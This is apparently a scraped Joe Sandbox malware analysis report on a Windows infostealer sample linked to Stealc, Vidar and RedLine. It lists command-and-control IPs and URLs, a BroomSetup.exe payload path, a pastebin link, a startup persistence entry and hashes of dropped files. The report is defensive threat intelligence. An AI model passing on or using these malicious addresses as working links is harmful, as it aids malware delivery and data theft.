                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://ocsp.thawte.com0Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://www.vmware.com/0/Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://185.172.128.76/3cd2b41cbde8fc9c.phptu3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://185.172.128.76/3cd2b41cbde8fc9c.phpuu3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      http://185.172.128.76/3cd2b41cbde8fc9c.phpftu3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://pastebin.com/raw/z9pYkqPQMSBuild.exe, 00000012.00000002.3318395339.00000000032CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
IP | Domain | Country | ASN | ASN Name | Malicious
185.172.128.90 | unknown | Russian Federation | 50916 | NADYMSS-ASRU | true
185.172.128.228 | unknown | Russian Federation | 50916 | NADYMSS-ASRU | false
20.157.87.45 | svc.iolo.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
91.215.85.66 | unknown | Russian Federation | 34665 | PINDC-ASRU | true
185.172.128.76 | unknown | Russian Federation | 50916 | NADYMSS-ASRU | true
176.97.76.106 | note.padd.cn.com | United Kingdom | 43658 | INTRAFFIC-ASUA | false
185.172.128.59 | unknown | Russian Federation | 50916 | NADYMSS-ASRU | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1430187
Start date and time: 2024-04-23 09:27:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 4BfhCycV4B.exe (renamed because original name is a hash value)
Original Sample Name: 71ef0fb3be89dc92fcbe7a6e8e6d6ee8.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@26/78@5/7
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 110
• Number of non-executed functions: 251
Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 20.12.23.50, 199.232.210.172, 192.229.211.108, 13.85.23.206, 20.190.157.11, 40.126.29.15, 40.126.29.13, 40.126.29.6, 40.126.29.14, 40.126.29.7, 40.126.29.11, 40.126.29.9, 20.3.187.198, 20.42.73.29, 23.33.180.114, 20.9.155.148, 69.164.42.0
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, gig-ai-prod-westus2-0.trafficmanager.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, sls.update.microsoft.com, gig-ai-prod-wus2-01-app-v4-tag.westus2.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
09:28:32 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tzgsecure.lnk
09:28:35 | API Interceptor | 1x Sleep call for process: cmd.exe modified
09:28:35 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
09:28:46 | API Interceptor | 286456x Sleep call for process: MSBuild.exe modified
09:29:01 | API Interceptor | 32767x Sleep call for process: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.172.128.90 | 5SLBlv4aUS.exe | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
• 185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
185.172.128.90 | XAcuSo8KDa.exe | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
• 185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
185.172.128.90 | f0FSseHktD.exe | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
• 185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
185.172.128.90 | wipOhNpHIG.exe | malicious | Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT
• 185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
185.172.128.90 | 8OeyVwIM3t.exe | malicious | Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT
• 185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
185.172.128.90 | f6pwu0HWXe.exe | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
• 185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
185.172.128.90 | V9TdcUeNlV.exe | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
• 185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
185.172.128.90 | JARlqZLmeA.exe | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
• 185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
185.172.128.90 | YQnYpHhUfM.exe | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
• 185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
185.172.128.90 | pfXiQ8s0eE.exe | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
• 185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
185.172.128.228 | 5SLBlv4aUS.exe | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
• 185.172.128.228/BroomSetup.exe
185.172.128.228 | XAcuSo8KDa.exe | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
• 185.172.128.228/BroomSetup.exe
185.172.128.228 | f0FSseHktD.exe | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
• 185.172.128.228/BroomSetup.exe
185.172.128.228 | wipOhNpHIG.exe | malicious | Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT
• 185.172.128.228/BroomSetup.exe
185.172.128.228 | 8OeyVwIM3t.exe | malicious | Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT
• 185.172.128.228/BroomSetup.exe
185.172.128.228 | f6pwu0HWXe.exe | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
• 185.172.128.228/BroomSetup.exe
185.172.128.228 | V9TdcUeNlV.exe | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
• 185.172.128.228/BroomSetup.exe
185.172.128.228 | JARlqZLmeA.exe | malicious | Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
                                                                                                                                                                                                                          • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                                                          YQnYpHhUfM.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                                                          pfXiQ8s0eE.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.228/BroomSetup.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                          • 91.215.85.66
                                                                                                                                                                                                                          xPudQBV1wJ.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 91.215.85.66
                                                                                                                                                                                                                          011876zHjm.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 91.215.85.66
                                                                                                                                                                                                                          6EKLugdUZ8.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 91.215.85.66
                                                                                                                                                                                                                          bRa3UYfQxA.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 91.215.85.66
                                                                                                                                                                                                                          azOt1mXieE.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 91.215.85.66
                                                                                                                                                                                                                          NADYMSS-ASRUq27UFusYdn.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          • 185.172.128.111
                                                                                                                                                                                                                          ipR98bCqps.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          • 185.172.128.76
                                                                                                                                                                                                                          5SLBlv4aUS.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                          XAcuSo8KDa.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                          WF2R8Bsptu.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          • 185.172.128.111
                                                                                                                                                                                                                          5F25UVdGxt.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          • 185.172.128.111
                                                                                                                                                                                                                          f0FSseHktD.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                          wipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                          8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                          f6pwu0HWXe.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704346314649071
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                                                                                                                                                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                                                                                                                                                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                                                                                                                                                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                                                                                                                                                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.68639364218091
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
                                                                                                                                                                                                                                                                                      MD5:1D78D2A3ECD9D04123657778C8317C4E
                                                                                                                                                                                                                                                                                      SHA1:3FAA27B9C738170AEE603EFAE9E455CA459EC1B7
                                                                                                                                                                                                                                                                                      SHA-256:88D5FF8529480476CA72191A785B1CCDB8A5535594C125AF253823DD2DC0820E
                                                                                                                                                                                                                                                                                      SHA-512:7EA58B30CB5FDA1C4D71DC65DF64FD9703E81DDCBAD9DA5B405CBBEACB9197A6E8B933C844289D7852801B6A5BC545C4234DD69E85F0AF640F5BC51BE5DDA12E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8439810553697228
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                                                                                                                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                                                                                                                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                                                                                                                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                                                                                                                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.701195573484743
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                                                                                                                                                                                                                      MD5:2530C45A92F347020337052A8A7D7B00
                                                                                                                                                                                                                                                                                      SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                                                                                                                                                                                                                      SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                                                                                                                                                                                                                      SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.696178193607948
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                                                                                                                                                                                                                      MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                                                                                                                                                                                                                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                                                                                                                                                                                                                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                                                                                                                                                                                                                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.696178193607948
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                                                                                                                                                                                                                      MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                                                                                                                                                                                                                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                                                                                                                                                                                                                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                                                                                                                                                                                                                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.692024230831571
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                                                                                                                                                                                                                                                      MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                                                                                                                                                                                                                                                      SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                                                                                                                                                                                                                                                      SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                                                                                                                                                                                                                                                      SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
